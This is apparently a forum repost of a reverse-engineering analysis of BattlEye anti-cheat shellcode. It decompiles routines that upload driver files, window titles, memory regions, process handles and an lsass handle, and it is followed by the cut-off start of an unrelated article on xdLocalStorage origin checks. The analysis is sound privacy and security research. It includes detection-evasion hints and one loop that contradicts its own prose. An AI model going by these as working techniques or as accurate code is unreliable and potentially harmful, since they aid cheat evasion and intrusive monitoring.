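    Based on the decompilations that follow, each report is a flat byte buffer with a two-byte header: a zero pad byte followed by the packet ID. A minimal sketch of that layout (our own naming; battleye::send itself is opaque):

    ```cpp
    #include <cstdint>
    #include <vector>

    // Builds the two-byte report header seen throughout the dumped shellcode:
    // byte 0 is a zero pad, byte 1 is the packet ID the server uses to
    // distinguish report types (0x0C = window list, 0x0D = device drivers,
    // 0xBE = raw file dump), followed by the report payload.
    std::vector<std::uint8_t> make_report(std::uint8_t packet_id,
                                          const std::vector<std::uint8_t>& payload) {
        std::vector<std::uint8_t> report;
        report.push_back(0x00);       // pad byte, always zero in the dumps
        report.push_back(packet_id);  // report type ID
        report.insert(report.end(), payload.begin(), payload.end());
        return report;
    }
    ```

    In the shellcode itself the header bytes are written directly into the malloc'd report buffer (report_buffer[0] = 0; report_buffer[1] = ID) before the enumeration loops append their data.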

    Device driver enumeration

    This routine has two main purposes: enumerating device drivers and installed certificates used by the respective device drivers. The former has a somewhat surprising twist though, this shellcode will upload any device driver(!!) matching the arbitrary “evil” filter to the game server. This means that if your proprietary, top-secret and completely unrelated device driver has the word “Callback” in it, the shellcode will upload the entire contents of the file on disk. This is a privacy concern as it is a relatively commonly used word for device drivers that install kernel callbacks for monitoring events.

    The certificate enumerator sends the contents of all certificates used by device drivers on your machine directly to the game server:

      // ONLY ENUMERATE ON X64 MACHINES
      GetNativeSystemInfo(&native_system_info);
      if ( native_system_info.u.s.wProcessorArchitecture == PROCESSOR_ARCHITECTURE_AMD64 )
      {
        if ( EnumDeviceDrivers(device_list, 0x2000, &required_size) )
        {
          if ( required_size <= 0x2000u )
          {
            report_buffer = (__int8 *)malloc(0x7530);
            report_buffer[0] = 0;
            report_buffer[1] = 0xD;
            buffer_index = 2;
    
            // DISABLE FILESYSTEM REDIRECTION IF RUN IN WOW64
            if ( Wow64EnableWow64FsRedirection )
              Wow64EnableWow64FsRedirection(0);
    
            // ITERATE DEVICE DRIVERS
            for ( device_index = 0; ; ++device_index )
            {
              if ( device_index >= required_size / 8u /* MAX COUNT*/ )
                break;
    
              // QUERY DEVICE DRIVER FILE NAME
              driver_file_name_length = GetDeviceDriverFileNameA(
                                          device_list[device_index],
                                          &report_buffer[buffer_index + 1],
                                          0x100);
              report_buffer[buffer_index] = driver_file_name_length;
    
              // IF QUERY DIDN'T FAIL
              if ( driver_file_name_length )
              {
                // CACHE NAME BUFFER INDEX FOR LATER USAGE
                name_buffer_index = buffer_index;
    
                // OPEN DEVICE DRIVER FILE HANDLE
                device_driver_file_handle = CreateFileA(
                                              &report_buffer[buffer_index + 1],
                                              GENERIC_READ,
                                              FILE_SHARE_READ,
                                              0,
                                              3,
                                              0,
                                              0);
    
                if ( device_driver_file_handle != INVALID_HANDLE_VALUE )
                {
                  // CONVERT DRIVER NAME
                  MultiByteToWideChar(
                    0,
                    0,
                    &report_buffer[buffer_index + 1],
                    0xFFFFFFFF,
                    &widechar_buffer,
                    0x100);
                }
                after_device_driver_file_name_index = buffer_index + report_buffer[buffer_index] + 1;
    
                // QUERY DEVICE DRIVER FILE SIZE
                *(_DWORD *)&report_buffer[after_device_driver_file_name_index] = GetFileSize(device_driver_file_handle, 0);
                after_device_driver_file_name_index += 4;
                report_buffer[after_device_driver_file_name_index] = 0;
                buffer_index = after_device_driver_file_name_index + 1;
    
                CloseHandle(device_driver_file_handle);
    
                // IF FILE EXISTS ON DISK
                if ( device_driver_file_handle != INVALID_HANDLE_VALUE )
                {
                  // QUERY DEVICE DRIVER CERTIFICATE
                  if ( CryptQueryObject(
                         1,
                         &widechar_buffer,
                         CERT_QUERY_CONTENT_FLAG_PKCS7_SIGNED_EMBED,
                         CERT_QUERY_FORMAT_FLAG_BINARY,
                         0,
                         &msg_and_encoding_type,
                         &content_type,
                         &format_type,
                         &cert_store,
                         &msg_handle,
                         1) )
                  {
                    // QUERY SIGNER INFORMATION SIZE
                    if ( CryptMsgGetParam(msg_handle, CMSG_SIGNER_INFO_PARAM, 0, 0, &signer_info_size) )
                    {
                      signer_info = (CMSG_SIGNER_INFO *)malloc(signer_info_size);
                      if ( signer_info )
                      {
                        // QUERY SIGNER INFORMATION
                        if ( CryptMsgGetParam(msg_handle, CMSG_SIGNER_INFO_PARAM, 0, signer_info, &signer_info_size) )
                        {
                          qmemcpy(&issuer, &signer_info->Issuer, sizeof(issuer));
                          qmemcpy(&serial_number, &signer_info->SerialNumber, sizeof(serial_number));
                          cert_ctx = CertFindCertificateInStore(
                                                       cert_store,
                                                       X509_ASN_ENCODING|PKCS_7_ASN_ENCODING,
                                                       0,
                                                       CERT_FIND_SUBJECT_CERT,
                                                       &certificate_information,
                                                       0); 
                          if ( cert_ctx )
                          {
                            // QUERY CERTIFICATE NAME
                            cert_name_length = CertGetNameStringA(
                                                 cert_ctx,
                                                 CERT_NAME_SIMPLE_DISPLAY_TYPE,
                                                 0,
                                                 0,
                                                 &report_buffer[buffer_index],
                                                 0x100);
                            report_buffer[buffer_index - 1] = cert_name_length;
                            if ( cert_name_length )
                            {
                              report_buffer[buffer_index - 1] -= 1;
                              buffer_index += character_length;
                            }
                            // FREE CERTIFICATE CONTEXT
                            CertFreeCertificateContext(cert_ctx);
                          }
                        }
                        free(signer_info);
                      }
                    }
                    // FREE CERTIFICATE STORE HANDLE
                    CertCloseStore(cert_store, 0);
                    CryptMsgClose(msg_handle);
                  }
    
                  // DUMP ANY DRIVER NAMED "Callback????????????" where ? is wildmark
                  if ( *(_DWORD *)&report_buffer[name_buffer_index - 0x11 + report_buffer[name_buffer_index]] == 'llaC'
                    && *(_DWORD *)&report_buffer[name_buffer_index - 0xD + report_buffer[name_buffer_index]] == 'kcab'
                    && (unsigned __int64)suspicious_driver_count < 2 )
                  {
                    // OPEN HANDLE ON DISK
                    file_handle = CreateFileA(
                        &report_buffer[name_buffer_index + 1],
                        0x80000000,
                        1,
                        0,
                        3,
                        128,
                        0);
    
                    if ( file_handle != INVALID_HANDLE_VALUE )
                    {
                      // INITIATE RAW DATA DUMP
                      raw_packet_header.pad = 0;
                      raw_packet_header.id = 0xBEu;
                      battleye::send(&raw_packet_header, 2, 0);
    
                      // READ DEVICE DRIVER CONTENTS IN CHUNKS OF 0x27EA (WHY?)
                      while ( ReadFile(file_handle, &raw_packet_header.buffer, 0x27EA, &size, 0x00) && size )
                      {
                        raw_packet_header.pad = 0;
                        raw_packet_header.id = 0xBEu;
                        battleye::send(&raw_packet_header, (unsigned int)(size + 2), 0);
                      }
    
                      CloseHandle(file_handle);
                    }
                  }  
                }
              }
            }
    
            // ENABLE FILESYSTEM REDIRECTION
            if ( Wow64EnableWow64FsRedirection )
            {
              Wow64EnableWow64FsRedirection(1, required_size % 8u);
            }
    
            // SEND DUMP
            battleye::send(report_buffer, buffer_index, 0);
            free(report_buffer);
          }
        }
      }
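The per-chunk framing used by the raw-data dump above (a 2-byte header of pad byte plus packet id 0xBE, followed by at most 0x27EA bytes of payload) can be sketched as follows. This is an illustrative re-implementation, not BattlEye's code; the function name and the list-of-packets return value are assumptions:

```python
# Sketch of the raw-dump framing seen in the decompilation above.
# Assumed layout: [pad: 1 byte][id: 1 byte][payload: <= 0x27EA bytes].
CHUNK_SIZE = 0x27EA
PACKET_ID = 0xBE

def build_raw_packets(data: bytes) -> list:
    """Split `data` into length-limited packets, each with a 2-byte header."""
    packets = []
    for offset in range(0, len(data), CHUNK_SIZE):
        payload = data[offset:offset + CHUNK_SIZE]
        packets.append(bytes([0x00, PACKET_ID]) + payload)
    return packets
```

Note that the driver dump also sends one bare 2-byte header before the first chunk, presumably to mark the start of a raw transfer.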
    

    Window enumeration

    This routine enumerates all visible windows on your computer. Each visible window has its title dumped and uploaded to the server together with the window class and style. If this shellcode is pushed while you have a Google Chrome tab open in the background with confidential information regarding your divorce, BattlEye now knows about this, too bad. While this is probably a really effective method to monitor the activities of cheaters, it is a very aggressive one and probably yields a ton of inappropriate information, which is sent to the game server over the internet. No window is safe from being dumped, so be careful when you load up your favorite shooter game.

    The decompilation is as follows:

      top_window_handle = GetTopWindow(0x00);
      if ( top_window_handle )
      {
        report_buffer = (std::uint8_t*)malloc(0x5000);
        report_buffer[0] = 0;
        report_buffer[1] = 0xC;
        buffer_index = 2;
        do
        {
          // FILTER VISIBLE WINDOWS
          if ( GetWindowLongA(top_window_handle, GWL_STYLE) & WS_VISIBLE )
          {
            // QUERY WINDOW TEXT
            window_text_length = GetWindowTextA(top_window_handle, &report_buffer[buffer_index + 1], 0x40);
    
        for ( i = 0; i < window_text_length; ++i )
          report_buffer[buffer_index + 1 + i] = 0x78;
    
            report_buffer[buffer_index] = window_text_length;
    
            // QUERY WINDOW CLASS NAME
            after_name_index = buffer_index + (char)window_text_length + 1;
            class_name_length = GetClassNameA(top_window_handle, &report_buffer[after_name_index + 1], 0x40);
            report_buffer[after_name_index] = class_name_length;
            after_class_index = after_name_index + (char)class_name_length + 1;
    
            // QUERY WINDOW STYLE
            window_style = GetWindowLongA(top_window_handle, GWL_STYLE);
            extended_window_style = GetWindowLongA(top_window_handle, GWL_EXSTYLE);
            *(_DWORD *)&report_buffer[after_class_index] = extended_window_style | window_style;
    
            // QUERY WINDOW OWNER PROCESS ID
            GetWindowThreadProcessId(top_window_handle, &window_pid);
            *(_DWORD *)&report_buffer[after_class_index + 4] = window_pid;
    
    
            buffer_index = after_class_index + 8;
          }
          top_window_handle = GetWindow(top_window_handle, GW_HWNDNEXT);
        }
        while ( top_window_handle && buffer_index <= 0x4F40 );
        battleye::send(report_buffer, buffer_index, false);
        free(report_buffer);
      }
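Each window record appended to the report buffer is two length-prefixed strings followed by two little-endian DWORDs (the combined style, then the owner PID). A hypothetical Python serializer for the same layout (names are mine, not from the shellcode):

```python
import struct

def pack_window_record(title: str, class_name: str, style: int, pid: int) -> bytes:
    # Layout: [len][title][len][class][style:4][pid:4], mirroring the report
    # buffer built above; truncation to 0x40 bytes mirrors the API calls.
    t = title.encode()[:0x40]
    c = class_name.encode()[:0x40]
    return (bytes([len(t)]) + t +
            bytes([len(c)]) + c +
            struct.pack("<II", style & 0xFFFFFFFF, pid))
```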
    

    Shellcode detection

    [2] Manually mapping an executable is a process of replicating the Windows image loader

    Another mechanism of this proprietary shellcode is the complete address space enumeration done on all processes running. This enumeration routine checks for memory anomalies frequently seen in shellcode and manually mapped portable executables [2].

    This is done by enumerating all processes and their respective threads. By checking the start address of each thread and cross-referencing this to known module address ranges, it is possible to deduce which threads were used to execute dynamically allocated shellcode. When such an anomaly is found, the thread start address, thread handle, thread index and thread creation time are all sent to the respective game server for further investigation.

    This is likely done because allocating code into a trusted process yields increased stealth. This check partially mitigates that, since shellcode stands out when threads are started directly at it. It would not, however, catch anyone using an alternative execution method such as thread hijacking.

    The decompilation is as follows:

    query_buffer_size = 0x150;
    while ( 1 )
    {
      // QUERY PROCESS LIST
      query_buffer_size += 0x400;
      query_buffer = (SYSTEM_PROCESS_INFORMATION *)realloc(query_buffer, query_buffer_size);
      if ( !query_buffer )
        break;
      query_status = NtQuerySystemInformation(
                        SystemProcessInformation, query_buffer, 
                        query_buffer_size, &query_buffer_size); 
      if ( query_status != STATUS_INFO_LENGTH_MISMATCH )
      {
        if ( query_status >= 0 )
        {
          // QUERY MODULE LIST SIZE
          module_list_size = 0;
          NtQuerySystemInformation(SystemModuleInformation, &module_list_size, 0, &module_list_size);
          modules_buffer = (RTL_PROCESS_MODULES *)realloc(0, module_list_size);
          if ( modules_buffer )
          {
            // QUERY MODULE LIST
            if ( NtQuerySystemInformation(
                   SystemModuleInformation,
                   modules_buffer,
                   module_list_size,
                   1) >= 0 )
            {
              for ( current_process_entry = query_buffer;
                    current_process_entry->UniqueProcessId != GAME_PROCESS_ID;
                    current_process_entry = (SYSTEM_PROCESS_INFORMATION *)(
                        (std::uint8_t *)current_process_entry +
                        current_process_entry->NextEntryOffset) )
              {
                if ( !current_process_entry->NextEntryOffset )
                  goto STOP_PROCESS_ITERATION_LABEL;
              }
              for ( thread_index = 0; thread_index < current_process_entry->NumberOfThreads; ++thread_index )
              {
                // CHECK IF THREAD IS INSIDE OF ANY KNOWN MODULE
                for ( module_count = 0;
                      module_count < modules_buffer->NumberOfModules
                   && current_process_entry->threads[thread_index].StartAddress < 
                        modules_buffer->Modules[module_count].ImageBase
                    || current_process_entry->threads[thread_index].StartAddress >= 
                        (char *)modules_buffer->Modules[module_count].ImageBase + 
                            modules_buffer->Modules[module_count].ImageSize);
                      ++module_count )
                {
                  ;
                }
                if ( module_count == modules_buffer->NumberOfModules )// IF NOT INSIDE OF ANY MODULES, DUMP
                {
                  // SEND A REPORT !
                  thread_report.pad = 0;
                  thread_report.id = 0xF;
                  thread_report.thread_base_address = 
                    current_process_entry->threads[thread_index].StartAddress;
                  thread_report.thread_handle = 
                    current_process_entry->threads[thread_index].ClientId.UniqueThread;
                  thread_report.thread_index = 
                    current_process_entry->NumberOfThreads - (thread_index + 1);
                  thread_report.create_time = 
                    current_process_entry->threads[thread_index].CreateTime - 
                        current_process_entry->CreateTime;
                  thread_report.windows_directory_delta = 0;
                  
                  if ( GetWindowsDirectoryA(&directory_path, 0x80) )
                  {
                    windows_directory_handle = CreateFileA(
                                                 &directory_path,
                                                 GENERIC_READ,
                                                 7,
                                                 0,
                                                 3,
                                                 0x2000000,
                                                 0);
                    if ( windows_directory_handle != INVALID_HANDLE_VALUE )
                    {
                      if ( GetFileTime(windows_directory_handle, 0, 0, &last_write_time) )
                        thread_report.windows_directory_delta = 
                            last_write_time - 
                                current_process_entry->threads[thread_index].CreateTime;
                      CloseHandle(windows_directory_handle);
                    }
                  }
                  thread_report.driver_folder_delta = 0;
                  system_directory_length = GetSystemDirectoryA(&directory_path, 128);
                  if ( system_directory_length )
                  {
                    // Append \\Drivers
                    std::memcpy(&directory_path + system_directory_length, "\\Drivers", 9);
                    driver_folder_handle = CreateFileA(&directory_path, GENERIC_READ, 7, 0, 3, 0x2000000, 0);
                    if ( driver_folder_handle != INVALID_HANDLE_VALUE )
                    {
                      if ( GetFileTime(driver_folder_handle, 0, 0, &drivers_folder_last_write_time) )
                        thread_report.driver_folder_delta = 
                            drivers_folder_last_write_time - 
                                current_process_entry->threads[thread_index].CreateTime;
                      CloseHandle(driver_folder_handle);
                    }
                  }
                  battleye::send(&thread_report.pad, 0x2A, 0);
                }
              }
            }
    STOP_PROCESS_ITERATION_LABEL:
            free(modules_buffer);
          }
          free(query_buffer);
        }
        break;
      }
    }
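The core test above — does a thread's start address fall inside any known module's image range — reduces to an interval-membership check. A sketch of just that logic (hypothetical helper names, not the shellcode's API):

```python
def inside_known_module(address: int, modules) -> bool:
    # modules: iterable of (image_base, image_size) pairs, mirroring the
    # RTL_PROCESS_MODULES entries walked in the decompilation above.
    return any(base <= address < base + size for base, size in modules)

def suspicious_starts(start_addresses, modules):
    # Threads whose start address belongs to no loaded module get flagged.
    return [addr for addr in start_addresses if not inside_known_module(addr, modules)]
```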
    

    Shellcode dumping

    The shellcode will also scan the game process and the Windows process lsass.exe for suspicious memory allocations. While the previous memory scan mentioned in the above section looks for general abnormalities in all processes specific to thread creation, this focuses on specific scenarios and even includes a memory region size whitelist, which should be quite trivial to abuse.

    [3] The Virtual Address Descriptor tree is used by the Windows memory manager to describe memory ranges used by a process as they are allocated. When a process allocates memory with VirtualAlloc, the memory manager creates an entry in the VAD tree. Source

    The game and lsass process are scanned for executable memory outside of known modules by checking the Type field in MEMORY_BASIC_INFORMATION. This field will be MEM_IMAGE if the memory section is mapped properly by the Windows image loader (Ldr), whereas the field would be MEM_PRIVATE or MEM_MAPPED if allocated by other means. This is actually the proper way to detect shellcode and was implemented in my project MapDetection over three years ago. Thankfully anti-cheats are now up to speed.

    After this scan is done, a game-specific check has been added which caught my attention. The shellcode will spam IsBadReadPtr on reserved and freed memory, which should always return true as there would normally not be any available memory in these sections. This aims to catch cheaters manually modifying the virtual address descriptor[3] to hide their memory from the anti-cheat. While this is actually a good idea in theory, this kind of spamming is going to hurt performance and IsBadReadPtr is very simple to hook.

    for ( search_index = 0; ; ++search_index )
    {
      search_count = lsass_handle ? 2 : 1;
      if ( search_index >= search_count )
        break;
      // SEARCH CURRENT PROCESS BEFORE LSASS
      if ( search_index )
        current_process = lsass_handle;
      else
        current_process = -1;
      
      // ITERATE ENTIRE ADDRESS SPACE OF PROCESS
      for ( current_address = 0;
            NtQueryVirtualMemory(
              current_process,
              current_address,
              0,
              &mem_info,
              sizeof(mem_info),
              &used_length) >= 0;
            current_address = (char *)mem_info.BaseAddress + mem_info.RegionSize )
      {
        // FIND ANY EXECUTABLE MEMORY THAT DOES NOT BELONG TO A MODULE
        if ( mem_info.State == MEM_COMMIT
          && (mem_info.Protect == PAGE_EXECUTE
           || mem_info.Protect == PAGE_EXECUTE_READ
           || mem_info.Protect == PAGE_EXECUTE_READWRITE)
          && (mem_info.Type == MEM_PRIVATE || mem_info.Type == MEM_MAPPED)
          && (mem_info.BaseAddress > SHELLCODE_ADDRESS || 
              mem_info.BaseAddress + mem_info.RegionSize <= SHELLCODE_ADDRESS) )
        {
          report.pad = 0;
          report.id = 0x10;
          report.base_address = (__int64)mem_info.BaseAddress;
          report.region_size = mem_info.RegionSize;
          report.meta = mem_info.Type | mem_info.Protect | mem_info.State;
          battleye::send(&report, sizeof(report), 0);
          if ( !search_index
            && (mem_info.RegionSize != 0x12000 && mem_info.RegionSize >= 0x11000 && mem_info.RegionSize <= 0x500000
             || mem_info.RegionSize == 0x9000
             || mem_info.RegionSize == 0x7000
             || mem_info.RegionSize >= 0x2000 && mem_info.RegionSize <= 0xF000 && mem_info.Protect == PAGE_EXECUTE_READ))
          {
            // INITIATE RAW DATA PACKET
            report.pad = 0;
            report.id = 0xBE;
            battleye::send(&report, sizeof(report), false);
            // DUMP SHELLCODE IN CHUNKS OF 0x27EA (WHY?)
            for ( chunk_index = 0; ; ++chunk_index )
            {
              if ( chunk_index >= mem_info.RegionSize / 0x27EA + 1 )
                break;
              buffer_size = chunk_index >= mem_info.RegionSize / 0x27EA ? mem_info.RegionSize % 0x27EA : 0x27EA;
              if ( NtReadVirtualMemory(current_process, mem_info.BaseAddress, &report.buffer, buffer_size, 0x00) < 0 )
                break;
              report.pad = 0;
              report.id = 0xBEu;
              battleye::send(&report, buffer_size + 2, false);
            } 
          }
        }
        // TRY TO FIND DKOM'D MEMORY IN LOCAL PROCESS
        if ( !search_index
          && (mem_info.State == MEM_COMMIT && (mem_info.Protect == PAGE_NOACCESS || !mem_info.Protect)
           || mem_info.State == MEM_FREE
           || mem_info.State == MEM_RESERVE) )
        {
          toggle = 0;
          for ( scan_address = current_address;
                scan_address < (char *)mem_info.BaseAddress + mem_info.RegionSize
             && scan_address < (char *)mem_info.BaseAddress + 0x40000000;
                scan_address += 0x20000 )
          {
            if ( !IsBadReadPtr(scan_address, 1)
              && NtQueryVirtualMemory(GetCurrentProcess(), scan_address, 0, &local_mem_info, sizeof(local_mem_info), &used_length) >= 0
              && local_mem_info.State == mem_info.State
              && (local_mem_info.State != 4096 || local_mem_info.Protect == mem_info.Protect) )
            {
              if ( !toggle )
              {
                report.pad = 0;
                report.id = 0x10;
                report.base_address = mem_info.BaseAddress;
                report.region_size = mem_info.RegionSize;
                report.meta = mem_info.Type | mem_info.Protect | mem_info.State;
                battleye::send(&report, sizeof(report), 0);
                toggle = 1;
              }
              report.pad = 0;
              report.id = 0x10;
              report.base_address = local_mem_info.BaseAddress;
              report.region_size = local_mem_info.RegionSize;
              report.meta = local_mem_info.Type | local_mem_info.Protect | local_mem_info.State;
              battleye::send(&report, sizeof(report), 0);
            }
          }
        }
      }
    }
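The "whitelist" deciding which executable private regions get fully dumped is just a predicate over region size and protection. Restated from the decompiled condition (PAGE_EXECUTE_READ is 0x20 on Windows; C's `&&` binds tighter than `||`, so each conjunction groups before the disjunctions):

```python
PAGE_EXECUTE_READ = 0x20  # winnt.h constant

def should_dump(region_size: int, protect: int) -> bool:
    # Restatement of the decompiled size filter from the dump branch above.
    return ((region_size != 0x12000 and 0x11000 <= region_size <= 0x500000)
            or region_size == 0x9000
            or region_size == 0x7000
            or (0x2000 <= region_size <= 0xF000 and protect == PAGE_EXECUTE_READ))
```

As the article notes, this is trivial to abuse: an allocation sized exactly 0x12000 bytes, for instance, is still reported but never dumped.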
    

    Handle enumeration

    This mechanism will enumerate all open handles on the machine and flag any game process handles. This is done to catch cheaters forcing their handles to have a certain level of access that is not normally obtainable, as the anti-cheat registers callbacks to prevent processes from gaining memory-modification rights of the game process. If a process is caught with an open handle to the game process, relevant info, such as level of access and process name, is sent to the game server:

    report_buffer = (__int8 *)malloc(0x2800);
    report_buffer[0] = 0;
    report_buffer[1] = 0x11;
    buffer_index = 2;
    handle_info = 0;
    buffer_size = 0x20;
    do
    {
      buffer_size += 0x400;
      handle_info = (SYSTEM_HANDLE_INFORMATION *)realloc(handle_info, buffer_size);
      if ( !handle_info )
        break;
      query_status = NtQuerySystemInformation(0x10, handle_info, buffer_size, &buffer_size);// SystemHandleInformation
    }
    while ( query_status == STATUS_INFO_LENGTH_MISMATCH );
    if ( handle_info && query_status >= 0 )
    {
      process_object_type_index = -1;
      for ( handle_index = 0;
            (unsigned int)handle_index < handle_info->number_of_handles && buffer_index <= 10107;
            ++handle_index )
      {
        // ONLY FILTER PROCESS HANDLES  
        if ( process_object_type_index == -1
          || (unsigned __int8)handle_info->handles[handle_index].ObjectTypeIndex == process_object_type_index )
        {
          // SEE IF OWNING PROCESS IS NOT GAME PROCESS
          if ( handle_info->handles[handle_index].UniqueProcessId != GetCurrentProcessId() )
          {
            process_handle = OpenProcess(
                               PROCESS_DUP_HANDLE,
                               0,
                               *(unsigned int *)&handle_info->handles[handle_index].UniqueProcessId);
            if ( process_handle )
            {
              // DUPLICATE THEIR HANDLE
              current_process_handle = GetCurrentProcess();
              if ( DuplicateHandle(
                     process_handle,
                     (unsigned __int16)handle_info->handles[handle_index].HandleValue,
                     current_process_handle,
                     &duplicated_handle,
                     PROCESS_QUERY_LIMITED_INFORMATION,
                     0,
                     0) )
              {
                if ( process_object_type_index == -1 )
                {
                  if ( NtQueryObject(duplicated_handle, ObjectTypeInformation, &typeinfo, 0x400, 0) >= 0
                    && !_wcsnicmp(typeinfo.Buffer, "Process", typeinfo.Length / 2) )
                  {
                    process_object_type_index = (unsigned __int8)handle_info->handles[handle_index].ObjectTypeIndex;
                  }
                }
                if ( process_object_type_index != -1 )
                {
                  // DUMP OWNING PROCESS NAME
                  target_process_id = GetProcessId(duplicated_handle);
                  if ( target_process_id == GetCurrentProcessId() )
                  {
                    if ( handle_info->handles[handle_index].GrantedAccess & (PROCESS_VM_READ|PROCESS_VM_WRITE) )
                    {
                      owning_process = OpenProcess(
                                         PROCESS_QUERY_LIMITED_INFORMATION,
                                         0,
                                         *(unsigned int *)&handle_info->handles[handle_index].UniqueProcessId);
                      process_name_length = 0x80;
                      if ( !owning_process
                        || !QueryFullProcessImageNameA(
                              owning_process,
                              0,
                              &report_buffer[buffer_index + 1],
                              &process_name_length) )
                      {
                        process_name_length = 0;
                      }
                      if ( owning_process )
                        CloseHandle(owning_process);
                      report_buffer[buffer_index] = process_name_length;
                      after_name_index = buffer_index + (char)process_name_length + 1;
                      *(_DWORD *)&report_buffer[after_name_index] = handle_info->handles[handle_index].GrantedAccess;
                      buffer_index = after_name_index + 4;
                    }
                  }
                }
                CloseHandle(duplicated_handle);
                CloseHandle(process_handle);
              }
              else
              {
                CloseHandle(process_handle);
              }
            }
          }
        }
      }
    }
    if ( handle_info )
      free(handle_info);
    battleye::send(report_buffer, buffer_index, false);
    free(report_buffer);
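The granted-access filter is a plain bitmask test. One subtlety worth noting: in C (and in Python) `&` binds tighter than `|`, so `access & PROCESS_VM_READ | PROCESS_VM_WRITE` without parentheses evaluates as `(access & PROCESS_VM_READ) | PROCESS_VM_WRITE` and is always non-zero. A small illustration using the real winnt.h constants:

```python
PROCESS_VM_READ = 0x0010   # winnt.h
PROCESS_VM_WRITE = 0x0020  # winnt.h

def has_memory_access(granted_access: int) -> bool:
    # Parenthesised on purpose: without the parentheses the expression
    # would OR in PROCESS_VM_WRITE and be truthy for every handle.
    return bool(granted_access & (PROCESS_VM_READ | PROCESS_VM_WRITE))
```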
    

    Process enumeration

    The first routine the shellcode implements is a catch-all function for logging and dumping information about all running processes. This is fairly common, but is included in the article for completeness’ sake. This also uploads the file size of the primary image on disk.

    snapshot_handle = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0x00 );
    if ( snapshot_handle != INVALID_HANDLE_VALUE )
    {
      process_entry.dwSize = 0x130;
      if ( Process32First(snapshot_handle, &process_entry) )
      {
        report_buffer = (std::uint8_t*)malloc(0x5000);
        report_buffer[0] = 0;
        report_buffer[1] = 0xB;
        buffer_index = 2;
        
        // ITERATE PROCESSES
        do
        {
          target_process_handle = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, false, process_entry.th32ProcessID);
          
          // QUERY PROCESS IMAGE NAME
          name_length = 0x100;
          query_result = QueryFullProcessImageNameW(target_process_handle, 0, &name_buffer, &name_length);
          name_length = WideCharToMultiByte(
              CP_UTF8, 
              0x00, 
              &name_buffer, 
              name_length,
              &report_buffer[buffer_index + 5], 
              0xFF, 
              nullptr, 
              nullptr);
          
          valid_query = target_process_handle && query_result && name_length;
          
          // Query file size
          if ( valid_query )
          {
            if ( GetFileAttributesExW(&name_buffer, GetFileExInfoStandard, &file_attributes) )
              file_size = file_attributes.nFileSizeLow;
            else
              file_size = 0;
          }
          else
          {
            // TRY QUERY AGAIN WITHOUT HANDLE
            process_id_information.process_id = (void *)process_entry.th32ProcessID;
            process_id_information.image_name.Length = 0;
            process_id_information.image_name.MaximumLength = 0x200;
            process_id_information.image_name.Buffer = name_buffer;
            
            if ( NtQuerySystemInformation(SystemProcessIdInformation, 
                                            &process_id_information, 
                                            24, 
                                            1) < 0 ) 
            {
              name_length = 0;
            }
            else
            {
              name_address = &report_buffer[buffer_index + 5];
              name_length = WideCharToMultiByte(
                              CP_UTF8,
                              0,
                              (__int64 *)process_id_information.image_name.Buffer,
                              process_id_information.image_name.Length / 2,
                              name_address,
                              0xFF,
                              nullptr,
                              nullptr);
            }
            file_size = 0;
          }
    
          // IF MANUAL QUERY WORKED
          if ( name_length )
          {
            *(_DWORD *)&report_buffer[buffer_index] = process_entry.th32ProcessID;
            report_buffer[buffer_index + 4] = name_length;
            *(_DWORD *)&report_buffer[buffer_index + 5 + name_length] = file_size;
            buffer_index += name_length + 9;
          }
          if ( target_process_handle )
            CloseHandle(target_process_handle);
          
          // CACHE LSASS HANDLE FOR LATER !!
          if ( *(_DWORD *)process_entry.szExeFile == 'sasl' )
            lsass_handle = OpenProcess(0x410, 0, process_entry.th32ProcessID);
        }
        while ( Process32Next(snapshot_handle, &process_entry) && buffer_index < 0x4EFB );
    
        // CLEANUP
        CloseHandle(snapshot_handle);
        battleye::send(report_buffer, buffer_index, 0);
        free(report_buffer);
      }
    }
    

    Sursa: https://secret.club/2020/03/31/battleye-developer-tracking.html

  16. Exploiting xdLocalStorage (localStorage and postMessage)

    Published by GrimHacker on 2 April 2020

    Last updated on 7 April 2020

    Some time ago, after looking into the security of HTML5 postMessage, I came across a site that was using xdLocalStorage. I found that the library had several common security flaws around lack of origin validation, then noticed that there was already an open issue in the project for this problem, added it to my list of things to blog about, and promptly forgot about it.

    This week I have found the time to actually write this post which I hope will prove useful not only for those using xdLocalStorage, but more generally for those attempting to find (or avoid introducing) vulnerabilities when Web Messaging is in use.

    Contents

    Background

    What is xdLocalStorage?

    “xdLocalStorage is a lightweight js library which implements LocalStorage interface and support cross domain storage by using iframe post message communication.” [sic]

    https://github.com/ofirdagan/cross-domain-local-storage/blob/master/README.md

    This library aims to solve the following problem:

    “As for now, standard HTML5 Web Storage (a.k.a Local Storage) doesn’t now allow cross domain data sharing. This may be a big problem in an organization which have a lot of sub domains and wants to share client data between them.” [sic]

    https://github.com/ofirdagan/cross-domain-local-storage/blob/master/README.md

    Origin

    “Origins are the fundamental currency of the Web’s security model. Two actors in the Web platform that share an origin are assumed to trust each other and to have the same authority. Actors with differing origins are considered potentially hostile versus each other, and are isolated from each other to varying degrees.
    For example, if Example Bank’s Web site, hosted at bank.example.com, tries to examine the DOM of Example Charity’s Web site, hosted at charity.example.org, a SecurityError DOMException will be raised.”

    https://html.spec.whatwg.org/multipage/origin.html

    Origin may be an “opaque origin” or a “tuple origin”.

    The former is serialised to “null” and can only meaningfully be tested for equality. A unique opaque origin is assigned to an img, audio, or video element when the data is fetched cross origin. An opaque origin is also used for sandboxed documents, data urls, and potentially in other circumstances.

    The latter is more commonly encountered and consists of:

    • Scheme (e.g. “http”, “https”, “ftp”, “ws”, etc)
    • Host (e.g. “www.example.com”, “203.0.113.1”, “2001:db8::1”, “localhost”)
    • Port (e.g. 80, 443, or 1234)
    • Domain (e.g. “www.example.com”) [defaults to null]

    Note “Domain” can usually be ignored to aid understanding, but is included within the specification.

    Same Origin

    Two origins, A and B, are said to be same origin if:

    1. A and B are the same opaque origin
    2. A and B are both tuple origins and their schemes, hosts, and ports are identical

    The following table shows several examples of origins for A and B and indicates if they are the same origin or not:

    A                          B                            same origin
    https://example.com        https://example.com          YES
    http://example.com         https://example.com          NO
    http://example.com         http://example.com:80        YES
    https://example.com        https://example.com:8443     NO
    https://example.com        https://www.example.com      NO
    http://example.com:8080    http://example.com:8081      NO
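The tuple comparison can be expressed directly. A minimal sketch using Python's urllib, filling in default ports for http/https so that an explicitly written default port still compares equal:

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}

def origin_tuple(url: str):
    # Reduce a URL to its (scheme, host, port) origin tuple.
    parts = urlsplit(url)
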